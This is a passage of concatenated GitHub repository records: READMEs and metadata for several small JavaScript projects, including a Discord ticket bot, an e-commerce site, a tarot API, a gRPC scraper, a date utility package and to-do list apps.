'Add some AmazingFeature'`) 4. Push to the Branch (`git push origin feature/AmazingFeature`) 5. Open a Pull Request <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LICENSE --> ## License Distributed under the MIT License. See `LICENSE.txt` for more information. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTACT --> ## Contact soon <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGMENTS --> ## Acknowledgments Use this space to list resources you find helpful and would like to give credit to. I've included a few of my favorites to kick things off! - [Img Shields](https://shields.io) - [GitHub Pages](https://pages.github.com) - [Font Awesome](https://fontawesome.com) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- MARKDOWN LINKS & IMAGES --> <!-- https://www.markdownguide.org/basic-syntax/#reference-style-links --> [contributors-shield]: https://img.shields.io/github/contributors/Cunga0X/Ticket-Bot.svg?style=for-the-badge [contributors-url]: https://github.com/Cunga0X/Ticket-Bot/graphs/contributors [forks-shield]: https://img.shields.io/github/forks/Cunga0X/Ticket-Bot.svg?style=for-the-badge [forks-url]: https://github.com/Cunga0X/Ticket-Bot/network/members [stars-shield]: https://img.shields.io/github/stars/Cunga0X/Ticket-Bot.svg?style=for-the-badge [stars-url]: https://github.com/Cunga0X/Ticket-Bot/stargazers [issues-shield]: https://img.shields.io/github/issues/Cunga0X/Ticket-Bot.svg?style=for-the-badge [issues-url]: https://github.com/Cunga0X/Ticket-Bot/issues [license-shield]: https://img.shields.io/github/license/Cunga0X/Ticket-Bot.svg?style=for-the-badge [license-url]: https://github.com/Cunga0X/Ticket-Bot/blob/master/LICENSE.txt [product-screenshot]: images/screenshot.png [Express.js]: https://img.shields.io/badge/express-563D7C?style=for-the-badge&logo=express&logoColor=white [Express-url]: https://expressjs.com/ [Discord.js]: https://img.shields.io/badge/discordjs-000000?style=for-the-badge&logo=discordjs&logoColor=white [Discord-url]: https://discord.js.org/
Advanced ticket bot written in JavaScript, using Discordjs 14
discord,discord-bot,discord-js,discord-js-v14,javascript,js,ticket-bot,ticket-bot-discord,ticketing-system,tickets
2023-05-12T08:59:18Z
2023-05-30T23:50:46Z
2023-05-12T16:42:05Z
1
0
25
2
3
6
null
MIT
JavaScript
amulyaparab/e-commerce-main-project
main
# Ascend. E-commerce website made with ReactJS. Website URL: https://e-commerce-main-project.vercel.app/ # Demo video https://github.com/amulyaparab/e-commerce-main-project/assets/86553695/bac1c853-ed22-4eb2-b448-9d2bbdbbb4a6 # Features * Landing Page * Categories * Bestsellers * Product Listing Page * Filters By * Price * Rating * Category * Sorts By Price * Search Product Functionality * Single Product Page * Cart Management * Wishlist Management * Order Management * Address Management * Checkout Management * Payment Gateway Integration * Authentication * Sign Up * Log In * Log Out * Toasts And Loaders * Responsive # Tech Stack * React JS * React Router v6 * React Hooks like- * useContext() * useReducer() * useState() * useParams() * useNavigate() * useLocation() * React Toastify for Toasts * Mock Backend with MockBee https://mockbee.netlify.app/ * Vanilla CSS * Font Awesome Icons * Razorpay Payment Gateway # How to run locally ``` $ git clone https://github.com/amulyaparab/e-commerce-main-project.git $ cd e-commerce-main-project $ npm install $ npm start ``` # Find me here * https://www.linkedin.com/in/amulyaparab/ * https://twitter.com/AmulyaParab
Ascend is a React JS e-commerce website for showcasing self care products and home-decor products. It provides a scalable platform with essential features such as product catalog management, secure user authentication, shopping cart functionality, user-friendly UI and order management.
e-commerce-website,javascript,reactjs
2023-05-16T11:51:52Z
2023-07-14T16:41:24Z
null
1
0
67
1
1
6
null
null
JavaScript
harshitclub/harshitclubweb
main
<div align="center" display="flex"> <h1><a href="https://www.harshitclub.com" target="_blank">harshitclub.com</a></h1> </div> <p align="justify"> Hi there, I'm Harshit Kumar, a Full Stack Web Developer with a passion for building dynamic websites and web applications that deliver real-world results. I'm excited to showcase my skills and expertise through my portfolio website, which you can find at <a href="https://www.harshitclub.com" target="_blank">harshitclub.com</a>.</p> <p>On my website, you'll find a comprehensive collection of my past projects, each one demonstrating my commitment to creating beautiful, functional websites that truly meet my clients' needs. Whether you're a potential employer, collaborator, or just someone interested in the world of web development, I invite you to explore my portfolio and see what I have to offer. </p> <p align="justify"> As a Full Stack Web Developer, I know the importance of creating a visually appealing and user-friendly website. That's why I put a lot of effort into designing my personal portfolio website - <a href="https://www.harshitclub.com" target="_blank">harshitclub.com</a>. I wanted to make sure that it was not only beautiful but also simple and elegant, so that it could easily grab the attention of anyone who visits it. </p> <p align="justify"> One of the key features of my portfolio website is its responsiveness. I made sure that it looks great and functions smoothly on every screen size and device, so that everyone can access my work and projects regardless of their device preferences. Whether you're using a desktop computer, a tablet, or a smartphone, you can easily navigate through my website and explore my portfolio without any issues. </p> <p align="justify"> I'm really proud of my personal portfolio website and the effort that I put into creating it. I believe that it showcases my skills and expertise as a Full Stack Web Developer and can serve as a great platform to connect with potential clients and collaborators. </p> ## Important Pages of [harshitclub](https://www.harshitclub.com) | Link | Page Name | | ------------------------------------------------- | :-----------: | | [/](https://www.harshitclub.com) | Home Page | | [/projects](https://www.harshitclub.com/projects) | Projects Page | | [/skills](https://www.harshitclub.com/skills) | Skills Page | | [/about](https://www.harshitclub.com/about) | About Page | | [/my-story](https://www.harshitclub.com/my-story) | My Story Page | ## Why I Choose [Next.js](https://nextjs.org/) to build [harshitclub](https://www.harshitclub.com) ### To Make [harshitclub](https://www.harshitclub.com) Fast As a Full Stack Web Developer, I understand the importance of creating a fast and seamless user experience on a website. That's why I chose to use Next.js to build my personal portfolio website. With its built-in server-side rendering and static site generation capabilities, Next.js allows me to create a website that loads quickly and efficiently. This means that visitors to my website can easily browse through my projects and work samples without any lag or delays. I am always striving to improve the user experience of my website, and Next.js has been instrumental in helping me achieve that goal. ### To Make [harshitclub](https://www.harshitclub.com) SEO Friendly I understand the importance of having a website that is not only visually appealing but also search engine optimized. That's why I chose Next.js to build my website. Next.js offers many benefits, including improved performance, server-side rendering, and easy integration with SEO tools. With Next.js, I was able to optimize my website for search engines, making it easier for users to find my website and its content. Plus, the added benefit of a faster loading website means a better user experience for my visitors. Overall, choosing Next.js for my website was a great decision that has helped me to achieve my goals of having a fast and SEO-friendly website. ### To Make [harshitclub](https://www.harshitclub.com) Secure Next.js is not only known for its speed and SEO-friendliness, but also for its built-in security features that make it an excellent choice for building secure websites. By choosing Next.js for my website, I can ensure that my website is protected against common security threats, such as cross-site scripting (XSS) and SQL injection attacks. Additionally, Next.js offers features like automatic code splitting and server-side rendering, which make it easier to develop secure and performant websites without compromising on the user experience. With Next.js, I can rest assured that my website is not only fast and SEO-friendly, but also secure and reliable. ## How You Can Contribute To This Project? As the creator of this project, I would love to welcome any contributions from the community. If you're interested in contributing, there are several ways you can get involved: - Fixing bugs and issues. - Implementing new features. - Enhancing the UI/UX design. - Improving the website's performance and speed. - Writing blog articles. - Testing and providing feedback. - Documenting the code and project setup. ## Final Words <p align="justify"> Thank you for taking the time to visit my portfolio website repository. I hope that my website provides you with insight into my skills and experience as a Full Stack Web Developer. I have put a lot of time and effort into building this website, and I welcome any feedback or suggestions that you may have. If you are interested in contributing to this project, please check the contribution guidelines. Also, if you have any questions, please feel free to reach out to me. Thank you again for your interest in my work. </p>
harshitclub.com is a personal portfolio website of Harshit Kumar, a Full Stack Web Developer. The website showcases his skills, expertise, and projects related to web development.
css3,github,nextjs,reactjs,rest-api,vercel,vercel-deployment,blog,html5,javascript
2023-04-28T06:42:53Z
2024-03-23T07:11:35Z
null
1
24
103
0
0
6
null
MIT
MDX
yunkhngn/tarot-insight
main
# Tarot Insight Repository Tarot Insight Repository is an open-source code repository for a cross-platform tarot card reading application. This repository provides source code, documentation, and resources necessary to build and develop a tarot card reading application. *Author: @yunkhngn* ---------- ## 1. Description The Tarot Insight app allows users to explore and discover the fascination of tarot cards through the following features: - Tarot card collection: The repository provides a complete collection of tarot cards, including both Major Arcana and Minor Arcana. Users can learn about each card and its meaning. - Automatic card reading: The app offers the ability to automatically draw a tarot card, allowing users to receive a random card and corresponding message to reflect and learn from. - Learn about tarot: The repository provides detailed documentation and guidance on the history, structure, and usage of tarot cards. Users can learn about tips, methods, and techniques for using tarot cards. - User-friendly interface: The app is designed with a simple and user-friendly interface, making it easy for users to interact and experience tarot card reading conveniently and easily. - Tarot Insight Repository is a useful resource for those interested in developing and expanding their own tarot card reading application. <img src="https://thepalmtreehouse.com/wp-content/uploads/2022/09/photo-1600429991827-5224817554f8.jpeg" style="border-radius:10px"></img> ## 2. Installation To install the app, follow these steps: 1. Clone the repository to your local machine ```sh git clone https://github.com/yunkhngn/tarot-insight.git cd tarot-insight ``` 2. Install dependencies ```sh yarn install ## or npm install ``` Run the app ```sh yarn start ## or npm start ``` 3. Install API dependencies ```sh cd api yarn install ## or npm install node index.js ``` ## 3. Usage To use the app, follow these steps: Launch the app on your preferred platform. Explore the tarot card collection and learn about each card. Draw a card to receive a message and reflect on its meaning. Learn more about tarot cards and techniques for using them in readings. Contributing. ## 4. Contribution Contributions to Tarot Insight Repository are welcome! To contribute, please follow these steps: 1. Fork the repository 2. Create a new branch for your feature or fix 3. Make changes and commit them to your branch 4. Submit a pull request to the main repository. _____________ ## API Documentation > Tarot API provides information parsed from AE Waite's The Pictorial Key to the Tarot. This was created using ExpressJS and Nodejs. ### Quick start ```javascript fetch("https://tarotinsight.vercel.app/api/") .then(function (response) { return response.json(); }) .then(function (response) { //extract data }) .catch(function (error) { // handle what went wrong }); ``` ### Documentation | GET path | Result | Params | | :---------------------------- | --------------------------------------- | :-------------------------------------------------------------------------------------------------------------- | | `/api/` or `/api/cards` | return all cards | | | `/api/cards/:name` | return card with specified `name` | `'/the-magician'`,`'/the-fool'`... | | `/api/cards/:name/:search/` | search fields of one cards | `/the-magician/desc` | | `/api/random` | get 3 random card with all meanings | | | `/api/random-mixed/` | get 3 random card but can be reversed or upright | **JSON format:** ```json { "type": string, "slug": string, "name_short": string, "name": string, "value": string, "value_int": integer, "meaning_up": string, "meaning_rev": string, "desc": string, "isReversed": boolean //only for random mixed } ``` _____________ ## 5. License Tarot Insight Repository is licensed under the MIT License. See LICENSE for more information.
The Tarot Insight web application offers an intuitive and interactive platform for tarot card readings.
expressjs,reactjs,javascript,vercel
2023-05-15T11:33:14Z
2023-06-01T10:03:08Z
null
1
0
8
0
2
6
null
MIT
JavaScript
Bryan-Herrera-DEV/python-javascript-backend-microservice
main
# ProximaSolves Test Este proyecto consiste en un servicio de scrapping en Python que obtiene datos de conversión de divisas y una API en NestJS que consume los datos del scraper y los almacena en una base de datos SQLite. Estos datos se muestran a travez del frontend en React. ## Estructura de carpetas ```js ├── nest-backend │ ├── src │ │ ├── app.module.ts │ │ ├── main.ts │ ├── Dockerfile │ └── ... ├── react-frontend │ ├── src │ │ ├── App.tsx │ │ ├── main.tsx │ ├── Dockerfile │ └── ... ├── python-microservice │ ├── scraper │ │ ├── scraper.py │ │ └── scraper.proto │ ├── Dockerfile │ └── ... ├── docker-compose.yml └── README.md ``` ## Patrones y arquitecturas El proyecto utiliza los siguientes patrones y arquitecturas: ### Microservicios El scraper de Python y la API de NestJS se implementan como microservicios independientes. Esto permite un mejor aislamiento de responsabilidades y facilita el escalado y mantenimiento de cada componente. ### gRPC Se utiliza gRPC para la comunicación entre el scraper de Python y la API de NestJS. gRPC es un marco de comunicación eficiente y rápido que utiliza Protocol Buffers para la serialización de datos. ### Repositorio Se emplea el patrón de repositorio en la API de NestJS para abstraer el acceso y manipulación de la base de datos SQLite. Esto permite cambiar fácilmente la implementación de la base de datos en el futuro si es necesario. ### CQRS Se utiliza el patrón CQRS para separar las operaciones de lectura y escritura en la API de NestJS. Esto permite escalar cada operación de forma independiente y facilita el mantenimiento del código. ### Docker Se utilizan Docker y Docker Compose para construir, empaquetar y ejecutar los microservicios en contenedores. Esto facilita el despliegue y la escalabilidad del proyecto. ## Configuración Local o despliegue 1. Asegúrate de tener instalado Docker y Docker Compose en tu máquina. 2. Ejecuta `docker-compose up --build` en la raíz del proyecto para construir y ejecutar los contenedores. El FrontEnd se encontrara en http://localhost:80 El servidor de Nest estará disponible en la dirección http://localhost:3001 La ruta para obtener los datos de conversión de divisas es http://localhost:3000/scraper/conversions/euro-to-dollar
A simple monorepository that implements the grpc pattern to link a nest backend with a python scrapper microservice. This backend is consumed by a frontend.
ddd-architecture,grpc,javascript,nest,nestjs,nestjs-backend,pyhton3,react,reactjs,tsx
2023-04-27T23:12:55Z
2023-04-28T15:44:55Z
null
1
5
19
0
0
6
null
null
TypeScript
Ziyodullodev/portfolio-web-site
main
null
portofolio web site with django, html, css, bootstrap
css,html5,javascript
2023-05-08T06:05:50Z
2023-06-23T19:44:21Z
null
1
0
9
0
0
6
null
null
HTML
mehmetkahya0/RandomStrangestLocations
main
# Random Strangest Locations 🕵️ When you press the button on this site, it takes you to interesting/funny/mystery places on google maps! LIVE DEMO: https://randomstrangestlocations.mehmet0.repl.co [![HitCount](https://hits.dwyl.com/mehmetkahya0/RandomStrangestLocations.svg?style=flat-square)](http://hits.dwyl.com/mehmetkahya0/RandomStrangestLocations) ## Installation To install the project, simply clone the repository and open the index.html file in a web browser. ## Usage To use the app, click on the "Random Location" button, and the app will generate a random set of coordinates within the specified range. These coordinates will be used to open a Google Maps link in a new tab, displaying the location. ## Customization To customize the range of coordinates that can be generated, simply edit the latitudeRange and longitudeRange variables in the script.js file. ## Screenshot ( Version 0.4 Beta) <img width="2240" alt="Ekran Resmi 2023-05-09 00 27 49" src="https://user-images.githubusercontent.com/84154488/236939088-f7e04f49-5c05-4e4c-b588-f3fb626c22b9.png"> ## License This project is licensed under the MIT License. See the LICENSE file for more information. ## Contact If you have any questions or suggestions for the project, feel free to contact me at [mehmetkahyakas5@gmail.com]. ### Thank you for using Random Stangest Locations!
When you press the button on this site, it takes you to interesting/funny/mystery places on google maps!
google,google-maps,location,random,css,fun,funny,html,javascript,js
2023-05-05T18:47:49Z
2023-11-01T06:43:52Z
2023-05-08T21:23:09Z
1
0
25
0
2
6
null
null
HTML
betagouv/mission-transition-ecologique
main
# Transition écologique des entreprises ![](https://img.shields.io/gitlab/license/45341092) --- ## `WARNING : work in progress` --- **An app + a web component + a dataset to help french entreprises finding public aid programs for their ecological transition.** A project from the `transition-ecologique-entreprises` SE team. - [Screenshots](#screenshots) - [Project Setup](#project-setup) - [Stack](#stack) - [Description](#description) - [Getting started](#getting-started) - [NVM](#nvm) - [Environment variables](#environment-variables) - [Quick Start](#quick-start) - [Build](#build) - [Start services](#start-services) - [Development Mode](#development-mode) - [Commands for a specific workspace](#commands-for-a-specific-workspace) - [Data validation](#data-validation) - [Credits](#credits) --- <div style="display: flex; flex-direction: row;"> <img src="./packages/web/images/logos/republique_francaise_rvb-1536x1392.webp" height="100px"> <img src="./packages/web/images/logos/logoademe2020_gb_rvb.webp" height="100px"> <img src="./packages/web/images/logos/95886_289860.webp" height="100px"> <img src="./packages/web/images/logos/logo_twitter_image-2019.jpg" height="75px"> </div> --- ## Screenshots ![](./packages/web/images/screenshots/screenshot-2023-11-29-a.png) ## Project Setup ### Stack - [NodeJS](https://nodejs.org/) (v18) - Back: [Express](http://expressjs.com/) (v4) - Front: [VueJS](https://vuejs.org/) (v3) - Design system: [DSFR](https://www.systeme-de-design.gouv.fr/) ### Description This repository is a monorepo, based on [npm workspaces](https://docs.npmjs.com/cli/v7/using-npm/workspaces/) composed of two workspaces: - the ["web" workspace](./packages/web/README.md) contains the front-end implementations. - the ["backend" workspace](./packages/backend/README.md) contains the back-end implementations. - the ["data" workspace](./packages/data/README.md) contains the datasets and common files for datasets builds. ## Getting started ### NVM The runtime is Node 18.x for this application. You can use [nvm](https://github.com/nvm-sh/nvm) to install this specific version. ```sh # from the root folder of the project nvm install nvm use ``` ### Environment variables Some environment variables are needed for the services to work. Copy and modify the `.env.example` file from the folders (`back`/`data`/`web`) you want to build/start to `.env` in the same directory. ### Quick Start If you want to run the project locally and quickly, you can use the following commands: ```sh # from the root folder of the project npm install npm run start-all ``` - Go to http://localhost:4242/ to access the front-end ### Build Use the following commands to build the project: ```sh # All workspaces npm run build # Or for a specific workspace npm run build-front # web npm run build-back # backend # Or alternatively npm run build -w packages/web npm run build -w packages/backend ``` ### Start services Use the following commands to start the project: ```sh # All workspaces npm run start-all # Or for a specific workspace # Front-end npm run start-front # Back-end npm run start-back # Or alternatively PORT=4242 npm run start --workspace packages/web npm run start --workspace packages/backend ``` ### Development Mode To run the project in development mode, use the following commands: ```sh # All workspaces npm run dev # Or for a specific workspace # Front-end npm run dev-front # Back-end npm run dev-back # Or alternatively npm run dev --workspace packages/web npm run dev --workspace packages/backend ``` #### Linting ```sh # All workspaces with fix npm run lint # All workspaces without fix npm run lint-check # Type check on web workspace npm run type-check --workspace packages/web # Type check on web workspace with watch mode npm run type-check-watch --workspace packages/web ``` ### Preview front before deploying in production ```sh # This script builds the front # and previews the produced index.html file from the dist folder # on http://localhost:4242 npm run build-and-preview-front ``` ### Commands for a specific workspace More scripts are defined for each workspace: checkout their respective documentation and `package.json` file. - backend: [README](./packages/backend/README.md) / [package.json](./packages/backend/package.json) - data: [README](./packages/data/README.md) / [package.json](./packages/data/package.json) - web: [README](./packages/web/README.md) / [package.json](./packages/web/package.json) Scripts can be triggered with: ```sh npm run <script-name> -w packages/<workspace-name> ``` --- ## Data validation Source program data are stored as YAML files, we use [JSON Schema](https://json-schema.org/) to validate every file. The validations are triggered by Github CI on each pull request on preprod and main branches. To run the validation tests manually, run: ```sh npm run test-data -w packages/backend ``` ## Scalingo, deployment and review apps We use scalingo manifest json to deploy the app on scalingo with specific environment variables. see [scalingo manifest](https://doc.scalingo.com/platform/app/app-manifest) for more details. --- ## Credits - Team - Product owner: Jean-Baptiste Le Dévéhat - Coaching: Julien Rayneau - Designers: Coline Lebaratoux - Maintainers: - Pierre Camilleri - Julien Paris - Yohann Valentin
Application Transition Ecologique des Entreprises
dsfr,javascript,typescript,vuejs3,webcomponents,ademe,ecologie,aides,express,publicodes
2023-05-05T12:48:58Z
2024-05-16T20:59:35Z
null
14
308
740
146
6
6
null
AGPL-3.0
TypeScript
surajaswal29/custom-dates-npm
main
# use-custom-dates [![JavaScript](https://img.shields.io/badge/Language-JavaScript-yellow)](https://developer.mozilla.org/en-US/docs/Web/JavaScript) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](http://makeapullrequest.com) [![Version](https://img.shields.io/badge/Version-1.0.0-blue)](https://github.com/surajaswal29/custom-dates/releases) [![License](https://img.shields.io/badge/License-ISC-green)](https://opensource.org/licenses/ISC) [![Downloads](https://img.shields.io/github/downloads/surajaswal29/custom-dates/latest/total.svg)](https://github.com/surajaswal29/custom-dates/releases) [![Contributors](https://img.shields.io/github/contributors/surajaswal29/custom-dates.svg)](https://github.com/surajaswal29/custom-dates/graphs/contributors) [![GitHub Issues](https://img.shields.io/github/issues/surajaswal29/custom-dates.svg)](https://github.com/surajaswal29/custom-dates/issues) This npm package, named "use-custom-dates", provides a utility function called `useCustomDates` that generates a customizable date range based on the current date. The function returns an object containing information about the current date, the previous year's date, and an array representing the labels for the last 7 days, including the day of the month and the corresponding month name. ## Key Features - Dynamic calculation of the current date, including day of the week, month, year, and leap year status. - Generation of a date range for the last 7 days, with customizable labels based on the day of the month and the corresponding month name. - Consideration of month lengths and leap years in the date calculations. ## Installation ``` npm install use-custom-dates ``` ## Usage ```javascript const useCustomDates = require("use-custom-dates") // Get date-related information const dateInfo = await useCustomDates() // Access properties from the returned object console.log(dateInfo) ``` **Output** ```javascript { current: { todayDate: '07', weekDay: 'Sunday', month: '01', year: 2024, date: '07/01/2024', monthName: 'January', monthLength: 31, isLeapYear: true }, previous: { year: 2023, month: 12, monthLength: 31, monthName: 'December' }, allMonths: [ { month: 'January', shortName: 'Jan', numOfDays: 31, weeks: 5 }, { month: 'February', shortName: 'Feb', numOfDays: 29, weeks: 4 }, { month: 'March', shortName: 'Mar', numOfDays: 31, weeks: 5 }, { month: 'April', shortName: 'Apr', numOfDays: 30, weeks: 5 }, { month: 'May', shortName: 'May', numOfDays: 31, weeks: 5 }, { month: 'June', shortName: 'Jun', numOfDays: 30, weeks: 5 }, { month: 'July', shortName: 'Jul', numOfDays: 31, weeks: 5 }, { month: 'August', shortName: 'Aug', numOfDays: 31, weeks: 5 }, { month: 'September', shortName: 'Sep', numOfDays: 30, weeks: 5 }, { month: 'October', shortName: 'Oct', numOfDays: 31, weeks: 5 }, { month: 'November', shortName: 'Nov', numOfDays: 30, weeks: 5 }, { month: 'December', shortName: 'Dec', numOfDays: 31, weeks: 5 } ], last7days: { from_date: 1, to_date: 7, L7D: [ { label: '1 January' }, { label: '2 January' }, { label: '3 January' }, { label: '4 January' }, { label: '5 January' }, { label: '6 January' }, { label: '7 January' } ] } } ``` ## Returned Object Properties **current** - **todayDate:** Day of the month with leading zero. - **weekDay:** Day of the week (e.g., "Monday"). - **month:** Month with leading zero. - **year:** Current year. - **date:** Full date string in UK format. - **monthName:** Full name of the current month. - **monthLength:** Number of days in the current month. - **isLeapYear:** Leap year status for the current year. **previous** - **year:** Previous year. - **month:** Previous month with leading zero. - **monthLength:** Number of days in the previous month. - **monthName:** Full name of the previous month. **allMonths:** Array containing information about all months. **last7days** - **from_date:** Start date of the last 7 days' range. - **to_date:** End date of the last 7 days' range. - **L7D:** Array of objects representing the last 7 days' date range labels. Each object has a label property containing the day of the month and the corresponding month name. ## Examples ```javascript // Example 1: Accessing current date information console.log(dateInfo.current.todayDate) console.log(dateInfo.current.weekDay) // Example 2: Accessing last 7 days' date range labels console.log(dateInfo.last7days.L7D) ``` ## License This project is licensed under the ISC License - see the LICENSE.md file for details. ## Author [Suraj Aswal](https://github.com/surajaswal29) ## Repository [GitHub Repository](https://github.com/surajaswal29/custom-dates)
This npm package, named 'use-custom-dates', provides a utility function called useCustomDates that generates a customizable date range based on the current date.
custom-dateformat,date,datetime,javascript,nodejs,npm-module,npm-package
2023-05-13T06:45:38Z
2024-01-07T10:30:58Z
2024-01-07T10:30:58Z
1
0
15
1
1
6
null
null
JavaScript
diarisdiakite/To-do-list
main
<a name="readme-top"></a> # 📖 [My-to-do-list](#my-to-do-list) 📗 Table of Contents 📖 [About the Project](#about-the-project) 🛠 [Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) 🚀 [Live Demo](#live-demo) 💻 [Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-test) - [Deployment](#deployment) 👥 [Authors](#authors) 🔭 [Future Features](#future-features) 🤝 [Contributing](#contributing) ⭐️ [Show your support](#show-your-support) 🙏 [Acknowledgments](#acknowledgment) ❓ [FAQ (OPTIONAL)](#faq) 📝 [Credit](#credit) 📝 [License](#licence) <br><br> ## 📖 [My-to-do-list](#my-to-do-list) ### 📖 <a name="about-the-project">Description </a> [My-to-do-list] is a Single Page App that allows users to create lists of tasks in an online application and perform basics operations like list all tasks and delete a task from the application. [`Back to top`](#readme-top) ### 🛠 <a name="project-built-with">Built With </a> The following technologies has been used in developping this project. #### <a name="tech-stack"> Tech Stack </a> ```[Tech-stack] client: HTML, CSS and Javascript. ```` [`Back to top`](#readme-top) ### <a name="key-features"> Key Features </a> `My-to-do-list` key features are the following main projects: ``` Project-feature1: Add task Project-feature2: Edit task Project-feature3: Remove task.s Project-feature4: Delete all completed tasks Project-feature5: List all tasks Project-feature7: Optimisation Project-feature8: Application deploy ``` [`Back to top`](#readme-top) ## 🚀 <a name="live-demo"> Live Demo </a> You can access the To-DO list at this link below. [Live Demo](https://diarisdiakite.github.io/To-do-list/dist/) [`Back to top`](#readme-top) ## 💻 <a name="getting-started"> Getting Started </a> ### <a name="setup"> Setup </a> Clone this repository to your desired folder: ```sh git clone https://github.com/diarisdiakite/to-do-list/ ``` [`Back to top`](#readme-top) #### <a name="prerequisites"> Prerequisites</a> In order to run the projects on this project you need: Have some knowledge of HTML and CSS Be familiar with git commands Basics understanding of Linters [`Back to top`](#readme-top) ### <a name="install">Install</a> Install the project with: [npm](https://www.npmjs.com/) ```[npm] git clone https://github.com/diarisdiakite/to-do-list/ run npx json-server -p 3500 -w data/db.json ``` [`Back to top`](#readme-top) ### <a name="usage">Usage</a> To run the to-do-list application, execute the following command: Open the project in code editor [`Back to top`](#readme-top) ### <a name="run-test">Run tests</a> To run tests, run the following command: Open the project in code editor and run the tests [`Back to top`](#readme-top) ### <a name="deployment">Deployment</a> You can deploy the to-do list application using: google cloud, Microsoft Azure, Netlify by giving credit on usign our template or contricute via pull requests (read more in the contributing section). [`Back to top`](#readme-top) ## 👥 <a name="authors">Authors</a> 👤 Didy GitHub: [@diarisdiakite](github.com/diarisdiakite) <br> Twitter: [@diarisd](www.twitter.com/diarisdiakite) <br> LinkedIn: [@diarisd](https://www.linkedin.com/in/diariatou-diakite-67ab80165/) <br><br> [`Back to top`](#readme-top) ## 🔭 <a name="future-features">Future Features</a> Upcoming features will include: [Display-task's-descrition] [`Back to top`](#readme-top) ## 🤝 <a name="contrubuting">Contributing</a> Contributions, issues, and feature requests are welcome! Please check the issues page. [`Back to top`](#readme-top) ## ⭐️ <a name="show-your-support">Show your support</a> If you like my [To-do-list]() you can support my work. Visit [my personal page](https://diarisdiakite.github.io/my-portfolio/). Please follow us on [@linkedin.com/diarisd](https://www.linkedin.com/in/diariatou-diakite-67ab80165/) and [@twitter.com/diarisd](](www.twitter.com/diarisdiakite) [`Back to top`](#readme-top) ## 🙏 <a name="acknowledgments">Acknowledgments</a> I would like to thank the Microverse community to inspire and encourage everyday programmers and aspiring programmers. Many thanks to my coding partners and particularly to [@Romans-adi](https://github.com/romans-adi) and [lincoln Gibson](https://github.com/lincoln1883) for their great hints during my Microverse Journey. [`Back to top`](#readme-top) ## ❓ <a name="faq">FAQ (OPTIONAL)</a> Here are the most common questions about this project. #### `Can we use the application as an organization` #### `Answer` Yes! Make sure you give us credit of the application. ### `Where can we reach out to you ?` #### `Answer` You can reach out to the organisation team by email [diarisdiakite@gmail.com](diarisdiakite@gmail.com). [`Back to top`](#readme-top) ## 📝 <a name="credit">Credit</a> this application was build by [Didy](https://diarisdiakite.github.io/my-portfolio/) proudly developed in [Microverse](https://www.microverse.org) program. [`Back to top`](#readme-top) ## 📝 <a name="licence">License</a> This project is [MIT](https://mit-license.org/) licensed. [`Back to top`](#readme-top)
The To-do-list is a Single Page App that allows users to create lists of tasks in an online application to help them organise their activities. It is developed using HTML, CSS and Javascript. The key features are: Create a new task, Edit Task, Check completed task, remove all completed tasks and list all the tasks. Tasks are saved in localStorage
accessibility,css,deployment,html,javascript,webpack
2023-05-09T02:15:49Z
2023-07-22T23:25:55Z
null
3
10
77
0
0
6
null
null
JavaScript
Mahamadou-Nouridine/to-do-list
main
<a name="readme-top"></a> <div align="center"> <h3><b>TO DO LIST</b></h3> </div> # 📗 Table of Contents - [📗 Table of Contents](#-table-of-contents) - [📖 TO DO LIST](#-to-do-list) - [🛠 Built With ](#-built-with-) - [Tech Stack ](#tech-stack-) - [Key Features ](#key-features-) - [🚀 Live Demo ](#-live-demo-) - [💻 Getting Started ](#-getting-started-) - [Prerequisites](#prerequisites) - [Setup](#setup) - [Usage](#usage) - [Run tests](#run-tests) - [👥 Authors ](#-authors-) - [🔭 Future Features ](#-future-features-) - [🤝 Contributing ](#-contributing-) - [⭐️ Show your support ](#️-show-your-support-) - [🙏 Acknowledgments ](#-acknowledgments-) - [📝 License ](#-license-) # 📖 TO DO LIST<a name="about-project"></a> TO DO LIST is an application that is used to manage tasks you can add todo or update todo also you can remove the todo you finished from it ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> - HTML - CSS - Javascript ### Key Features <a name="key-features"></a> - [ ] **Add Todo** - [ ] **Remove Todo** - [ ] **Update Todo** <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🚀 Live Demo <a name="live-demo"></a> > Add a link to your deployed project. - [Live Demo Link](https://mahamadou-nouridine.github.io/to-do-list/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 💻 Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps. ### Prerequisites In order to run this project you need: - a browser - git - nodejs ### Setup Clone this repository to your desired folder: ```sh cd my-folder git clone https://github.com/mahamadou-nouridine/to-do-list.git npm install ``` ### Usage To run the project, execute the following command: ```sh Open index.html in browser or open with Live server in Vscode ``` ### Run tests To run tests, run the following commands: ```sh npx stylelint "**/*.{css,scss}" npx hint . npx eslint . ``` <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 👥 Authors <a name="authors"></a> 👤 **Mahamadou Nouridine** - GitHub: [mahamadou-nouridine](https://github.com/mahamadou-nouridine) - Linkedin: [mahamadou-nouridine-mamoudou-souley-2b424a1a5](https://www.linkedin.com/in/mahamadou-nouridine-mamoudou-souley-2b424a1a5) - Twitter: [Nouridine_Dino](https://twitter.com/Nouridine_Dino) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🔭 Future Features <a name="future-features"></a> - [ ] **Connect to database** <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](https://github.com/Mahamadou-Nouridine/to-do-list/issues). <p align="right">(<a href="#readme-top">back to top</a>)</p> ## ⭐️ Show your support <a name="support"></a> If you like this project give me a follow and/or a star <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🙏 Acknowledgments <a name="acknowledgements"></a> I would like to thank all my coding partners at Microverse <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 📝 License <a name="license"></a> This project is [MIT](./LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
TO DO LIST is an application that is used to manage tasks you can add todo or update todo also you can remove the todo you finished from it
